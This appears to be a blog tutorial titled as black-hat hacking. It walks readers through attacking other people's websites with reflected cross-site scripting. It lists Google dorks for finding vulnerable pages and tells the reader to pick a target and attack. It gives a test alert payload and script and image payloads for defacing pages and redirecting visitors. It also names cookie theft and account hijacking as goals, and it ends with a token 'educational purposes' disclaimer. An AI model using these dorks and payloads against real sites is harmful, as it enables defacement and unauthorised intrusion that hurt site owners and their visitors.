Latest Posts

» » Hacking Websites Using XSS - Black Hat Hacking

 Hacking Websites Using XSS - Black Hat Hacking

Cross-site scripting (XSS) is a type of website security vulnerability typically found in web applications that enables client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.




Types of XSS vulnerabilities:

1.Persistent
2.Non persistent

In this post, i'll explain about the non persistent vulnerability. On Persistent i'll write later.
Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability
When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.

Attacker can do with XSS:

XSS Attacks be used for the following:
       
        •Compromising and Hijacking Accounts
        •Stealing User Cookies
        •Defacing Websites
        •Phishing Attacks
        •Posting Hostile Content


Instructions:
Step 1: First of all find the vulnerablitiy using google dorks. You can find dorks online.
Most commonly used dorks are as follow:

inurl:com_feedpostold/feedpost.php?url=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=Search&k=

Step 2: Choose a target website.

Step 3: Attack..:D

Find out the vulnerability:

1)Find a textbox in the site or something where you can submit text.


2)Type in the following and hit Submit Query button.


<script>alert("learn-ethical-hacking.com");</script>


3)If it'll be vulnerable it should look like as follow.


Defacing:

There are few ways which can be used  to deface a site when you find a XSS vulnerability.


1) Makes A Picture Pop-Up:


<script>location="www.website.com/yourdefacepic";</script>


2) Replace The Content Of The Page By An Image:


<img src="yoursite.com/yourdefacepic/>


3)Redirect To A Website


<script>window.location="http://www.yoursite.com"</script>

You've done all.. Hope i'll help you great.

DISCLAIMER: ONLY FOR EDUCATIONAL PURPOSES.

If you face any problem write us.


6:49 AM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Technical Tutorials,Tips and Tricks And Premium Accounts © 2013. All Rights Reserved. Powered by Blogger
Top